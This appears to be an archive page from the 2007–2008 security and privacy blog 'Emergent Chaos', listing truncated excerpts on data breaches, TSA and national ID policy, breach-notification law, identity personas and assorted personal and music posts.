In “Crowd control at eBay,” Nick Carr writes: EBay has been struggling for some time with growing discontent among its members, and it has rolled out a series of new controls and regulations to try to stem the erosion of trust in its market. At the end of last month, it announced sweeping changes to […]

 

Where's the Beef?

As I was driving home, listening to the radio, I heard this: We’ve been really astonished by how some of the most high-profile situations actually resulted in increased consumer confidence, because sometimes high-profile issues give us an opportunity to talk about what we do, and that has actually encouraged consumers. No, it’s not a TJX […]

 

Chill, dude.

Because Baltimore police officer Salvatore Rivieri seemingly was unable to tell he was being filmed. Pity. There’s some infosec relevance to obsessing and overreacting to one thing, while being oblivious to another that could prove far more damaging.

 

Obama vs. McDonalds

As he was winning contests in Iowa and South Carolina, Senator Barack Obama raised $32 million in January for his presidential bid, tapping 170,000 new contributors to rake in nearly double the highest previous one-month total for any candidate in this election cycle. The New York TImes, “Enlisting New Donors, Obama Reaped $32 Million in […]

 

Because RealID Isn't Good Enough

Apparently we need not one, but two national ID cards. Illinois Reps. Mark Kirk and Peter Roskam (may they not get re-elected in November) are introducing legislation that would mandate that Social Security cards have “a photograph and fingerprint, as well as a computer chip, bar code and magnetic strip.” The cards would be modeled […]

 
 

Two brief followups to "Already donated the limit"

First, I’d like to thank everyone for keeping the comments civil and constructive. Second, I’d like to respond to Philll’s comment, “You sure do pick the strangest issues to make non-negotiable.” I picked this because it struck me that the rules in question were being accepted and treated in the various discussions as fixed and […]

 

Economist Debates Security V Privacy

The Economist emails: Our second series of three debates kicks off today and the first proposition raises important questions about civil rights and the trade-off between Privacy vs. Security. As a blogger and member of the community that The Economist aims to serve with this lively debate, we wanted to extend an invitation to you […]

 

People Not Being Terrorized

Recently, a group of passengers on the London Underground performed the dance from Michael Jackson’s “Thriller” in front of an unsuspecting audience. Shockingly, no one panicked. You can see one passenger move out of the way, but people otherwise just sat there and watched. When the performance was done, the fellow-passengers applauded. Security was not […]

 

Computer Capers and Progress

We’re coming up on the 30th anniversary of the publication of “Computer Capers: Tales of electronic thievery, embezzlement, and fraud,” by Thomas Whiteside. What, might you ask, can we learn from a 30 year old text? Nothing has changed. Except, for some of the names. Donn Parker is in there, as are a melange of […]

 
 
 
 

How To Fly With An Expired License

Yahoo news recently reported the story of Charleston, West Virginia Mayor Danny Jones who used a photo of himself in a magazine to prove his identity. In brief, he was flying out of John Wayne Airport and his drivers license was expired so he wasn’t going to be allowed to get past security. The Charleston […]

 

"We have to be careful we don't release the wrong person"

Hence, we imprison and deport American citizens for immigration violations. Thomas Warziniack was born in Minnesota and grew up in Georgia, but immigration authorities pronounced him an illegal immigrant from Russia. Immigration and Customs Enforcement has held Warziniack for weeks in an Arizona detention facility with the aim of deporting him to a country he’s […]

 

How dumb do we think spammers are?

Why is it we easily admit that spammers are people smart enough to run massive bot nets, design custom malware, create rootkits, and adapt to changing protection technologies but we still think that they’re unable to write a pattern to match “user at domain dot com”? Kudos to the first person who puts such a […]

 

The UK Driver's License Applicants Breach and Laws

Dark Reading reported that “Data on 3M UK Drivers ‘Lost in Iowa’.” “In May this year, Pearson Driving Assessments Ltd, a private contractor to the Driving Standards Agency, informed the agency that a hard disk drive had gone missing from its secure facility in Iowa City, Iowa,” Kelly said. “The hard disk drive contained the […]

 

Welcome, Crispin!

Michael Howard has broken the news: “Crispin Cowan joins Windows Security: I am delighted to announce that Crispin Cowan has joined the core Windows Security Team! For those of you who don’t know Crispin, Crispin is responsible for a number of very well respected Linux-based security technologies such as StackGuard, the Immunix Linux distro, SubDomain […]

 

Reporting on breaches

It started with Mark Jewell of the AP, “Groups: Record data breaches in 2007.” Dissent responded to that in “Looking at 2007’s data breaches in perspective:” The following table depicts the number of U.S. incidents reported and the corresponding number of records reported expose by the three main sites that track such data: Attrition.org, the […]

 

One man's vulgarity is another's lyric

DOYLESTOWN, Pennsylvania (AP) — A man who wrote a vulgar message on the memo line of a check he used to pay a $5 parking ticket has apologized in writing, leading police to drop a disorderly conduct charge against him. David Binner sent the check after receiving a $5 parking ticket. He calls it “a […]

 

TSA's insecure "Traveller Identity Verification" site slammed by Oversight Committee

First exposed nearly a year ago, by DIY boarding pass mastermind Chris Soghoian, a TSA web site intended to help travelers improperly recorded on watch lists has been slammed by a House Oversight and Government Reform Committee report: TSA awarded the website contract without competition. TSA gave a small, Virginia-based contractor called Desyne Web Services […]

 

Risk Assessment is Hard

The BBC reports (TV personality) “Clarkson stung after bank prank” in which he published his bank account numbers in the newspaper: The Top Gear host revealed his account numbers after rubbishing the furore over the loss of 25 million people’s personal details on two computer discs. He wanted to prove the story was a fuss […]

 

The Laboratories of Democracy in Action

Chris emailed me a bit before Christmas with a link to the new “New York State Security Breach Reporting Form.” How could we withhold this exciting news? I wanted to wait until people were back from vacation, so they didn’t miss it. The form is important because it’s starting to ask for more data. There’s […]

 

Andy Olmsted

Andy Olmsted, who posted as G’Kar on Obsidian Wings, was killed yesterday in Iraq. I always enjoyed his posts, especially when I disagreed with them, because he was so clearly thoughtful. I find myself terribly sad for the death of a man who I only knew through his words. He asked that we not politicize […]

 

Ohio Voters May Demand Paper Ballots

Ohio Secretary or State Jennifer Brunner announced yesterday that paper ballots must be provided on request. Poll workers won’t be told to offer the option to voters but must provide a ballot if requested to help “avoid any loss of confidence by voters that their ballot has been accurately cast or recorded,” a directive from […]

 

Citibank limiting ATM withdrawals in NYC?

Title: Citibank limits ATM cash in city Author: KERRY BURKE and LARRY McSHANE Source: DAILY NEWS Date Published:January 3rd 2008 Excerpt: The New York-based Daily News reported today that Citibank has limited the cash amount its customers can take out of ATM machines. It is being reported that the security of Citibank’s ATM machines in […]

 

"Security Vulnerability Research & Defense"

My co-workers in SWI have a new blog up, “Security Vulnerability Research & Defense.” They’re planning to…well, I’ll let them speak for themselves: …share more in-depth technical information about vulnerabilities serviced by MSRC security updates and ways you can protect your organization from security vulnerabilities… The two posts below are examples of the type of […]

 

Emergent Privacy Reporting

On December 19th, Denebola, the student run newspaper of Newton South High School, broke the news that video cameras had been secretly installed in their school. Not only were students and parents not notified of the cameras but apparently neither were any of the teachers. From the student article: According to Salzer, only he, Superintendent […]

 

Aaron Burr and Compulsory Key Disclosure

Orin Kerr has a fascinating tidbit at Volokh, “Encryption, the Fifth Ammendment, and Aaron Burr:” Following my posts last week on encryption and the Fifth Amendment, a few readers asked about how courts have dealt with such issues before. As far as I know, there is only one other judicial decision specifically addressing the Fifth […]

 

Merry Christmas, Dr. Hansen!

A surgeon who allegedly took a photo of a patient’s penis during an operation at a US hospital is no longer working there, it has been announced. Dr Adam Hansen, of Arizona’s Mayo Clinic Hospital, is accused of taking the snap while conducting gallbladder surgery earlier in December. (BBC, “US ‘penis photo doctor’ loses job.”) […]

 

Bonobos!

Check out this amazing video from TED.

 

Six breach reports in the UK: the floodgates are open

In Dissent’s weekly roundup of breaches, there were six breaches reported for the UK, versus nine in the US. It seems that the duty of care approach is really taking off. Newly reported incidents in the U.K. and Ireland: In Ireland, the Driver and Vehicle Licensing Agency has lost the personal details of 6,000 people. […]

 

The Words of our (Founding) Fathers

There’s an article in the Washington Post, “In the Course of Human Events, Still Unpublished.” It’s about how the papers of the founding fathers of the United States are still not available except in physical form, and the scholarly practice that keeps them there. Many of the founding fathers’ letters have been transcribed and made […]

 

Deloitte & Touche, Ponemon Study on Breaches

According to Dark Reading, “Study: Breaches of Personal Data Now Prevalent in Enterprises:” According to a study released yesterday by the Ponemon Institute and Deloitte & Touche, 85 percent of the security or privacy executive surveyed — some 800 individuals — claimed at least one reportable security incident in the past 12 months. Sixty-three percent […]

 

Clark Kent Ervin on TSA Security

Normally, it’s not news when someone takes aim at TSA policies like this: If you are someone who suspects that what is billed as “aviation security” is often more show than substance, you are not alone. In fact, you are part of what Nixon aides used to call the “silent majority.” The security bureaucracy seems […]

 

So when's the Chicago gig, gents?

‘Good Times Bad Times’ ‘Ramble On’ ‘Black Dog’ ‘In My Time Of Dying’ (full version) ‘For Your Life’ ‘Trampled Under Foot’ ‘Nobody’s Fault But Mine’ ‘No Quarter’ ‘Since I’ve Been Loving You’ ‘Dazed And Confused’ ‘Stairway To Heaven’ ‘The Song Remains The Same’ ‘Misty Mountain Hop’ ‘Kashmir’ ‘Whole Lotta Love’ ‘Rock And Roll’ Playlist via: […]

 

Data Thefts Triple This Year?

So says USA Today, in “Theft of personal data more than triples this year.” A few small quibbles: I’d prefer if Byron Acohido had said “reported” thefts It’s not clear if thefts or reports tripled. I suspect the reports, but proving that would be tough. Both of those things said, it’s a good article, and […]

 

The Emergent Chaos of the US Presidential Campaign

This New York Times really is interesting. It’s all about how candidates are losing control of their campaigns, and they’re in a new relationship with emergent phenomenon on the internet. Now, as we come to the end of a tumultuous political year, it seems clear that the candidates and their advisers absorbed the wrong lessons […]

 

Stupid Safety Feature Of The Week

I love my Prius. It’s fun to drive, eco-friendly and even has lots of geek appeal. However it has one incredibly moronic safety feature which I was reminded of while driving through the snow the other day. Now I have the base model which means I don’t have fancy features like the automatic skid prevention. […]

 

CA1386 meet AB1298

Life is about to get a lot more complicated for companies that do business in California. I completely missed this getting signed back in October, but on 10/14, the Governator signed AB1298 which updates CA1386 to mandate that medical and health insurance policy information also are to be treated as PII. To say that this […]

 

Gartner the omniscient

This in reference to the recent HMRC breach… However, [Gartner VP Avivah] Litan warned that the chance of identity theft was actually small, at just 1%. Digitaltrends.com The probability of this estimate being scientifically defensible is 0.00%. I’ll have something to say about learning (for real) from the HMRC breach in a soon-to-come post.

 

Open Letter to Chris Dodd

Dear Chris: I think you’re a smart person who cares about honesty and the rule of law. I also think your e-mail fundraising campaign is undermining that message by sending what I believe to be deliberately deceptive emails. To be clear, I am not referring to deception in the political message — spinning words, being […]

 

Biometrics are not a panacea for data loss

Ian Brown writes, “Biometrics are not a panacea for data loss:” “What we must ensure is that identity fraud is avoided, and the way to avoid identity fraud is to say that for passport information we will have the biometric support that is necessary, so that people can feel confident that their identity is protected.” […]

 

HMRC Data discs on EBay

Quite possibly the funniest infosec joke seen in 2007. Here we have two CD-R’s for auction. They are not blank, but seem to have some sort of database written to them. I found them in my local courier firm’s sorting office, addressed to “Her Majesties Audit Office – Child Benefits Section” and marked “Sensitive HM […]

 

Vulnerability Disclosure Agents Part N

Recently Dave G of Matasano (and smoked salt) fame two interesting articles on Vulnerability Disclosure Markets. In the second one, he reposted a user’s comment: Based on the failing (due to agenda) of (particular) Researchers, Coordinators (i.e. FIRST Members) and Vendors – Which “trusted person or organization” is left “that can represent vulnerability researchers whose […]

 

The costs of liability

It’s become common for people thinking about security economics to call for liability around security failures. The idea is that software creators who who ship insecure products could be held liable, because they’re well positioned to address the problems. I don’t think this is a trouble-free idea. There are lots of complexities. As one example, […]

 

Why can't the CIA hire guys like this?

The Telegraph is concerned that The most senior British intelligence official, appointed yesterday to oversee MI5, MI6 and GCHQ, has a website revealing his home address, phone numbers and private photographs of himself, family and friends. www.telegraph.co.uk The upshot seems to be that the gent in question, Alex Allan, lacks the circumspection one would demand […]

 

Controlling Water

In Controlling Water, Dana writes: …Alex Stupak, […] dropped this bombshell in my ear with the casual effect of a little bird chirping their daily song. With no prompt, he said simply, “You know, it’s really just about controlling water,” and walked away. This simple phrase had the power of a plot changing hollywood one […]

 

Wednesday Privacy Roundup

Privacy in the EU has been hugely in the news in the last week. Check these out: European Union justice ministers Friday agreed on a minimum set of rules protecting the cross-border exchange of personal data by law-enforcement agencies in the 27 member states. There’s were lots of other proposals discussed, including ones that mimic […]

 

Splunk'd?

I have been playing with Splunk, for about 45 minutes. So far, I like it. I’ve previously been exposed to Arcsight, but what I have more of an affinity for psychologically is not so much a correlation engine, but a great visualization tool that automagically can grok log formats without making me write a hairy […]

 

How Government Can Improve Cyber-Security

In “How Can Government Improve Cyber-Security?” Ed Felten says: Wednesday was the kickoff meeting of the Commission on Cyber Security for the 44th Presidency, of which I am a member. The commissionhas thirty-four members and has four co-chairs: Congressmen Jim Langevin and Michael McCaul, Admiral Bobby Inman, and Scott Charney. It was organized by the […]

 

Measuring the Wrong Stuff

There’s a great deal of discussion out there about security metrics. There’s a belief that better measurement will improve things. And while I don’t disagree, there are substantial risks from measuring the wrong things: Because the grades are based largely on improvement, not simply meeting state standards, some high-performing schools received low grades. The Clove […]

 

The Magic Phone

The “gPhone” was announced today. I put gPhone in quotes, because there was no actual phone announcement. What was announced was the “Open Handset Alliance” and their toolkit, Android. They are “…committed to commercially deploy handsets and services using the Android Platform in the second half of 2008.” and “An early look at the Android […]

 

Gordon Brown on liberty

While this great tradition can be traced back to the Magna Carta, it was the rise of the modern state with all the new powers at its disposal that made the 17th century the pivotal period in the struggle against arbitrary and unaccountable government —— as Britain led the way in the battle for freedom […]

 

Informed discussion? Cool!

David Litchfield examines some public breach data and concludes that Word documents and spreadsheets mistakenly left on a web server or indexed by a search engine account for 20.6% of the 276 breaches, both physical and digital, recorded up to the 23rd of October. He further surmises that the proportion may be even higher, since […]

 

WEIS 2008 Call for papers

The call for papers for the 2008 Workshop on Economics and Information Security, to be held at Dartmouth’s Tuck School of Business in late June, has just been issued. […] The 2008 Workshop on the Economics of Information Security invites original research papers focused on the economics of information security and the economics of privacy. […]

 

Today's Free Advice from David Litchfield

Just because you can’t see it, doesn’t mean it’s not there. Also it doesn’t mean you can’t figure out what it is…. Much like traffic analysis what you show and how you show it, can reveal a lot about what is going on behind the scenes.

 

Beat To The Punch

Yesterday, Sammy Migues talked about the risk of too much risk management. The only problem is that he completely misused the term Risk Management. I was all set to post a rant about that here, and in fact spent far too much time last night writing up a response. In the meantime, the Hoff and […]

 

15-30 dataloss incidents daily, sez top Fed cyber-beancounter

The Office of Management and Budget issued a memo in July 2006 requiring agencies to report security incidents that expose personally identifiable information to the U.S. Computer Emergency Readiness Team within one hour of the incident. By June 2007, 40 agencies reported almost 4,000 incidents, an average of about 14 per day. As of this […]

 

Emergent Breach Analysis

When I started blogging about breaches and breach notices way back in early 2005, a number of friends wrote to say I was sounding like a broken record. They were right, and at the same time, I felt there was something really big going on, and I wanted to push it and shape it. Over […]

 
 

What Would One Actually Do With A Persona?

I asked Bob Blakley and Mike Neuenschwander some questions about Limited Liability Personae. Rather than focusing on the implementation, I wanted to talk about the high level purposes, as well as concerns that most people have with the idea of a persona. Whenever I discuss personae, there are issues that frequently come up, for example: […]

 

Visa says TJX Impacted 94 million accounts, $68MM+ in fraud

“Although TJX suggests that the breach only affected approximately 45.7 million accounts, in fact the breach during a period of 17 months affected more than 94 million separate accounts. To date, Visa has calculated the fraud losses experienced by issuers as a result of the breach to be between $68 million and $83 million on […]

 

With p=.7, Breach Costs Will Fall by 2009

There’s an article over on Tekrati, “Cost of a sensitive data breach will increase 20 percent per year through 2009, says Gartner.” Near as I can tell, this is the sort of half-thought through analysis which Gartner sometimes spews, to the great detriment of their reputation. (To be fair, I can only see what other […]

 

Breaches: Coverup & Disclosure

There’s an interesting case of breach non-disclosure documented in the Edmonton Sun, “Privacy breach at MacEwan.” It’s interesting for a few reasons. First, the breach wasn’t disclosed: MacEwan College was cited in the auditor general’s report this week after a tipster told the AG’s office about the security breach in 2006. It mirrored access problems […]

 

What's an Identity Oracle (LLPersonas)

Adam: So you say “my oracle.” Who is that? Is it an entity which I control? To be cynical, how does ‘my identity oracle’ differ from Choicepoint? Bob Blakely:My oracle most assuredly does not belong to me. It’s a commercial enterprise. It differs from choicepoint in that it has contracts with its data subjects which […]

 

How to Better Cite Blogs

Via BoingBoing, we learn that the NIH has a guide to citing blogs. Cool! Respectworthy! And a little lacking as a citation format. Here’s their first sample: Bernstein M. Bioethics Discussion Blog [Internet]. Los Angeles: Maurice Bernstein. 2004 Jul – [cited 2007 May 16]. Available from: http://bioethicsdiscussion.blogspot.com/. There are at least two major problems with […]

 

More on LLPersonae, Identity Oracles, and RCSL

Adam: But applying for a job is exactly what you describe, “organizations with whom you don’t have a lot of history and interaction.” For an awful lot of people, they apply for jobs broadly. One cashiership is as good as another. And there are a lot of places where I’d like to protect my privacy. […]

 

Limits of Limited Liability Personas?

Adam: I have some cost questions, but I think more importantly, this can limit my exposure to, say, a credit card, but I can get most of this without paying Delaware a couple of hundred bucks. I get a PO box, a limited credit card, and a voice mail service. What’s the advantage that’s worth […]

 

Bob Blakely on the LLP

Adam: The LLP is a great analogy because that’s exactly what the Limited Liability Partnership was, and is, for-controlling liability in transactions. The growth of the limited liability corporation allows me, as an investor, to invest a set amount of money, and know the limits of my exposure to management errors. But I can’t do […]

 

Mike Neuenschwander on Limited Liability Personas: Intro

I was deeply intrigued when I read an article in the New York Times, “Securing Very Important Data: Your Own.” Mike Neuenschwander of the Burton Group proposed an idea of “limited liability personas.” I thought this was so cool that I emailed him, proposing we interview him for the blog. He’s agreed, and here’s part […]

 

Breach Laws Charts

At The Privacy Symposium that Harvard Law just held, I had a fascinating conversation with Julie Machal-Fulks of the law firm of Scott & Scott. Scott and Scott have published a one page breach laws chart, with just five variables. Julie Brill of the Vermont Attorney General’s office also mentioned that she maintains a chart. […]

 

EWeek on The Gap Breach

Lisa Vaas has a great article in eWeek, “Let’s Demand Names in Data Fumbles” That unnamed vendor should indeed be taken to task. The Gap is now in the process of contacting an enormous number of people in the United States and Canada whose information may have been compromised, and it’s providing credit reporting services […]

 

Sammer at Officer Candidate School

Those of you who don’t know Sameer Parekh can ignore this message. For those of you who do, he’s joined the Marines and is attending Officer Candidate School, and would appreciate your letters: He does not have access to email or phone. Please send him snail mail (US mail) as often as you can. He […]

 

Looking for a challenge? Life dull?

If you need a change in your life, consider this job posting: Title: IT Security Architecture Manager Needed Company: TJX Companies Location: Framingham, MA Skills: Very strong technical security background in both the mainframe and distributed environments. Term: Full Time Pay: DOE Length: Full Time Detail: TJX Companies is seeking an IT Security Architecture Manager […]

 

Blogging @ Work: Blue Hat and Threat Modeling

BlueHat 6 was a great event. I had a really good time listening and talking with the attendees and speakers. The team is also looking to share a lot more about what’s happening, and one way they’ve done that is to open up their blog to speakers. There are posts from Rain Forest Puppy, Halvar […]

 

Connecticut Sues Accenture over Ohio Breach

As reported in the Scott and Scott Business and Technology law blog: Connecticut hired Accenture to develop network systems that would allow it to consolidate payroll, accounting, personnel and other functions. Information related to Connecticut’s employees was contained on a data tape stolen from the car of an Accenture intern working on an unrelated, though […]

 

What Secure Flight Really thinks about you

You can find out, by making a request under the privacy act. “Read Your Own DHS Travel Dossier.” Good commentary and context at Threat Level, “Howto: Check Your Homeland Security Travel File.”

 

SmartHippo Launches

Have you ever wondered how banks make so much money in the mortgage business? If you stop to think about it, mortgages are the ultimate commodity product these days. The bank collects information from you, gives you a loan, outsources the customer service to a loan servicing company, and securitizes your loan. So how do […]

 

Bayesian battlefield

According to court papers referenced in this VOA report, U.S. sniper teams in Iraq are using an interesting tactic: [A] so-called baiting program developed at the Pentagon by the Asymmetrical Warfare Group….the baiting was described as putting items, including plastic explosives, ammunition and detonation cords on the battlefield then killing suspected insurgents who picked up […]

 

How unladylike

Like most EC readers, I have been following the story of the MIT student with the breadboard and Duracell fashion accessory who nearly got ventilated at Logan airport in the most LED-hostile city in the US, Boston. The Associated Press was quick to repeat the claim that the student was wearing a “fake bomb”, when […]

 

Transparency in Government

The Privacy Commissioner of Canada is blogging. Welcome to the blogosphere! In unrelated news, the Canadian dollar reached parity with the US dollar for the first time in thirty years. See the Canadian Broadcasting Company, “$1 Cdn = $1 US.”

 

Free, as in milk

What the hell are the idiots at Facebook thinking? If there’s anything stupider than banning a woman from breastfeeding in public, it is banning a picture of a woman breastfeeding on the grounds that it is “obscene”, which is what the morons at Facebook have done, as reported (for example) by the Toronto Star. Attention […]

 

Motley Fool on SIAC

Case in point: SAIC confessed in July that “information … stored on a single, SAIC-owned, non-secure server at a small SAIC location, and in some cases … transmitted over the Internet in an unencrypted form … was placed at risk for potential compromise.” In the context of other firms having actual knowledge of miscreants accessing […]

 

Analyzing The TD Ameritrade Disclosure

In a press release, TD Ameritrade this morning confirmed reports that it has been informing customers of a potential security breach. The release does not confirm the figure of 6.3 million customers, but a company spokesperson did give that number to reporters in interviews. (Dark Reading, “TD Ameritrade Breach Affects 6.3M Customers.”) It appeared that […]

 

No word on the lupins

NSW Police are investigating the possible compromise of an online florist’s database and theft of customers’ credit card details. The Fraud Squad has set up Strike Force Parkview to investigate the case that involves the retailer Roses Only. There are unconfirmed reports that the details were used to make a string of luxury purchases in […]

 

When Hackers Don't Strike

Today the New York Times asks us: “Who Needs Hackers?” The article itself which discusses the recent outages at LAX and with Skype is fairly fluffy but has some great quotes which really cover the issues that we should be looking at as an industry. Security isn’t just about hackers, but about managing threats and […]

 

The Fight Against HSPD12

There’s a fascinating court fight, being run by people at the Jet Propulsion Lab. See “JPL Employees File Suit to End Background Investigations” From the press release: The plaintiffs include highly placed engineers and research scientists at JPL who have been involved in critical roles in NASA’s most successful recent programs, including leading engineers and […]

 

"I'm in Love with a Girl"

Another in the occasional EC weekend series highlighting awesome covers. I’d like this video even if it was silent. That stage is perfect for a Big Star tune, and the sound is right on. [If only they also performed “Thirteen“…Chilton and friends are too old (or indifferent) to play it properly now].

 
 

Pfizer's little problem

For the third straight month, the pharmaceutical giant is reporting a serious security breach that may have resulted in the loss of personal data belonging to current and/or former employees. The most recent breach, reported last week, involves the potential theft of personal data on some 34,000 current and former workers at the company. … […]

 

The analog hole strikes again!

I had occasion to park at a rather large parking garage attached to a rather larger complex of hospitals in downtown Chicago today. The company that runs this garage does something smart — in addition to numbering the floors of the garage and giving them a characteristic color, they also play a well-known musician’s tunes […]

 

From the Advances in Aviation Desk

The Beeb reports, “Goats sacrificed to fix Nepal jet,” in which we learn that two goats were slaughtered in sacrifice to the Hindu god of sky protection, Akash Bhairab, in front of a Boeing 757. Airline official Raju KC said to Reuters, “The snag in the plane has now been fixed and the aircraft has […]

 

Happy Labor Day

…from Chicago. (May 1st was jettisoned as a date for reasons near and dear to EC — it was too political.)

 

Links of the day

http://plato.stanford.edu/entries/economics/ http://faculty.fuqua.duke.edu/~rnau/choice/whoswho.htm (Also useful as a reading list for a possible upcoming cage match between Hutton and Bejtlich ;^))

 

Inside Carnivore

Ryan Singel has a long article in Wired: “Point, Click … Eavesdrop: How the FBI Wiretap Net Operates.” I was pretty stunned at some of the numbers: FBI endpoints on DCSNet have swelled over the years, from 20 “central monitoring plants” at the program’s inception, to 57 in 2005, according to undated pages in the […]

 

Senator Craig and the Behavior Detection Officers

…airport police Sgt. Dave Karsnia, who was investigating allegations of sexual conduct in airport restrooms, went into a stall shortly after noon on June 11 and closed the door. Minutes later, the officer said he saw Craig gazing into his stall through the crack between the door and the frame. After a man in the […]

 

Harvard Business Review on Breaches

Via Chris Hoff, “Harvard Business Review: Excellent Data Breach Case Study…” we learn that the Harvard Business Review has a case study, “Boss, I think Someone Stole Out Customer Data.” The fictitious company profiled is Flayton Electronics, a regional electronics chain with 32 stores across six states. The premise of the fictitious data breach focuses […]

 

No, Breach Notification Service is a Good Sign

Over at Dark Reading, there’s a story about First Advantage Membership Services launching a breach notification service. Andrew Conry-Murray starts out: You know data security breaches are way too common when a company builds a business around customer notification of stolen information. and he ends: I applaud companies that comply with notification requirements. It’s the […]

 

Giving Data to Auditors

In light of well-publicized failures to maintain appropriate controls by the ‘final four’ audit firms, giving data to auditors without a clear and compelling business purpose is a bad idea. It’s such a bad idea, even an auto body shop objects: Auto body repair shops in British Columbia are complaining to the province’s privacy commissioner […]

 

Typical British overstatement

I saw a BBC headline, “Huge payout in US stuttering case“, and figured that somebody who stutters must have been harassed at work or something, and got a settlement of $5 mil. WRONG. What happened is this: Six US citizens who, as children, were used in an experiment that tried to induce stuttering have been […]

 

Second Breach Closure: Verus?

I’ve been fond of saying that no company goes under because of a breach. It used to be there was one exception, CardSystems Solutions. There now appears to be a second, Verus, Inc, a medical information processor that revealed information on customers of at least five hospitals. “Medical IT Contractor Folds After Breaches.” So that […]

 

Examining Wikipedia Anonymous Edits

It’s recently been amusing to look at where Wikipedia’s anonymous edits come from. There have been many self-serving edits from obvious places, as well as selfless ones from unexpected sources. I am most amused by this selfless edit which came from IP address 132.185.240.120, which translates to webgw0.thls.bbc.co.uk. I can only think that had the […]

 

Breach outliers: $118m charge for TJX

The Associated Press reports that “TJX profit plunges on costs from massive data breach:” FRAMINGHAM, Mass. (AP) – TJX’s second-quarter profit was cut by more than a half as the discount store owner recorded a $118 million charge due to costs from a massive breach of customer data….About one-tenth of the charge from the data […]

 

I can't concieve of a better use for anonymity

There’s a fascinating little sidebar article in the Economist (4 August 2007), “Misconceived:” Now that anonymity is no longer possible, there has been a huge decline in the number willing to donate. So more patients travel for treatment to countries where anonymity is still legal. If this new proposal is implemented, it may give such […]

 

British House of Lords gets it

From a report published August 10 by the House of Lords select committee on science and technology: 5.55.  We further believe that a data security breach notification law would be among the most important advances that the United Kingdom could make in promoting personal Internet security. We recommend that the Government, without waiting for action at […]

 

ChoicePoint's data quality

In a comment, Tom Lyons asked: I have two clients who are asking me to investigate matters with Choice Point as it relates to inaccurate employment records provide to prospective employers. I am seeking persons who have similar experiences to determine a “pattern and practice” on the part of Choice Point. I don’t know Mr. […]

 

Pseudonyms in the News: Fake Steve Jobs Outed

Brad Stone of the New York Times is a killjoy. Geez. Part of the joy of reading The Secret Diary of Steve Jobs is was thinking of him as Fake Steve Jobs, and nothing more. Sure, it’s all good that his employer was so delighted that FSJ is going to be hosted by them, now, […]

 

German Biometric Trials

The assessment of the Federal Criminal Police Office (BKA) according to which biometric visual-image search systems are not advanced enough to be used by the police to search for persons has led to mixed reactions. The Federal Criminal Police Office presented the fairly sobering research results of its visual-image search systems project on Wednesday in […]

 

Maybe if I yell at you, you'll trust in what I'm saying

Tourists visiting the White House must now adhere to a dress code which bans jeans, sneakers, shorts, miniskirts, T-shirts, tank tops, and flip-flops. Since this is an extremely important rule, signs were posted and emails sent White House staff (writes Al Kamen in the Washington Post). A telling detail, per the WaPo: The e-mail reminder […]

 

System Admin Appreciation Day

…is today, July 27. Pizza and beer retailers are standing by, much as florists do on Valentine’s Day. You know what to do.

 

Metricon 2.0 Registration Closes Friday

Metricon 2.0 looks to be a great set of papers. I’d tell you what I’m looking forward to, but really, I’m looking forward to the whole day. And it’s only $225, but you have to register by Friday.

 

Full Disclosure debate, 2.0

A poor choice of names (I guess “best UNIX editor” was their second choice), but Silicon.com is doing something that seems worthwhile by launching their Full Disclosure Campaign. Silicon.com wants the government to review its data protection legislation and improve the reporting of information security breaches in the public and private sectors. We are calling […]

 

Hamster Wheel of Pain™, FOIA edition

So, the USDA messes up and, in response to FOIA requests directed to them about tobacco subsidies, sends records containing taxpayer ID numbers (along, one presumes, with names) to the several FOIA requestors. Meanwhile, an enterprising lad sends a FOIA request about data breaches to North Carolina — a state known for tobacco production. That […]

 

You can't spell "Really pointless flamefest" without R-O-I

Rich Bejtlich, with whom I do not want to argue about definitions unless I have a much thicker dictionary than he, has taken aim at the (mis?)use of ROI by security people. EC readers may be interested in a blog post by Ken Belva, in which the guy who literally (co)wrote the book on establishing […]

 

Other comments on the GAO Report

[Added July 21] Roger Grimes, “Identity theft? What identity theft:” Here’s my long-held feeling: If even one customer record is compromised, it should be immediately disclosed to the consumer. None of this, “You need 10,000 or more records stolen before it is reported” or “Only report if likely to be used in financial theft.” Forget […]

 

What If The Hokey Pokey Is What It's All About?

I’ve always thought that folks in operation security and product security had a whole lot to learn from each other. Unfortunately for the product security people, they now also get to learns about the pain of vendors swooping down on them trying to sell them the latest and greatest crap. Last night, Mary Ann Davidson […]

 

Whose Line Is It Anyway?

For quite a while now, I’ve been claiming that in order for InfoSec to do it’s job properly, it needs to understand the business. Yesterday, Jack Jones again showed that he’s in the same camp when he asked us: “Risk Decision Making: Whose call is it?” There he shares his thoughts how to decide whether […]

 

Pete Seeger strikes again

The New York Times Magazine with a long article about swimming the Hudson River. Image:Clearwater.org

 

Electronic data: you can sell it and have it

Mike Rothman has the unmitigated temerity to go on vacation and deprive me of his daily rant^H^H^H^Hincite, but not before remarking on the Certegy data loss incident: So Certegy (a big check processor) loses a couple million records with information like bank accounts and credit card numbers. And Certegy’s president gets interviewed and says because […]

 

152:1

As governor of Texas, George Bush didn’t see fit to commute any of the 152 death sentences brought before him. (Wikipedia) Good thing Scooter Libby ain’t no poor Texan, because if he was, Bush wouldn’t have ruined his law and order record. (Noted at Discourse.net.) Update: 6 days later, the New York Times notes that […]

 

More controls creates more risk?

Over at his excellent blog, Chandler Howell referenced an interesting risk analysis performed by a home inspector: “The power switch for the garbage disposal in the sink could be accidentally turned on by a person standing at the sink while their hand was in the disposal.” That is to say, the switch is right next […]

 

Data on Data Breaches

At the FIRST conference in Seville, Spain, I delivered a presentation about “Data on Data Breaches” that Adam and I put together. The slides, with the notes I made to act as “cue cards” for me, are available as a large PDF file on a slow web server. The main points I tried to make […]

 

Doctors want more study on overuse of books

(Adds psychiatrist interview, industry comment, paragraphs 4, 7-17) CHICAGO, June 27 (EmergentChaos)- The American Medical Association called for more research into the public health risks of books and reading on Wednesday but stopped short of declaring them addictive. The AMA, which recommended a review of the current publishing system, also said it would leave it […]

 

Stop Real ID, again

Apparently, the forces of evil have inserted themselves a national ID clause into the immigration bill (two bad bills, risen from the dead together?) Please go to Unreal ID’s action page to send a fax. It only takes a minute.

 

Maybe things are different (maybe they're the same)

The article to which Adam linked in his post about Dark Side of the Moon mentioned derivative versions of the album as performed by other artists. That got me thinking of memorable covers, such as Senor Coconut’s classic renditions of Kraftwerk tunes (like The Robots and Autobahn). Ultimately, I just gotta throw in a quick […]

 

Security Tradeoffs

This is from Non Sequitur by Wiley. Since I’ve shrunk it to fit, the guard says to the other: Accept the security breach, or clean a litter box. Take your pick. Click the picture for the full-size one.

 

Awareness

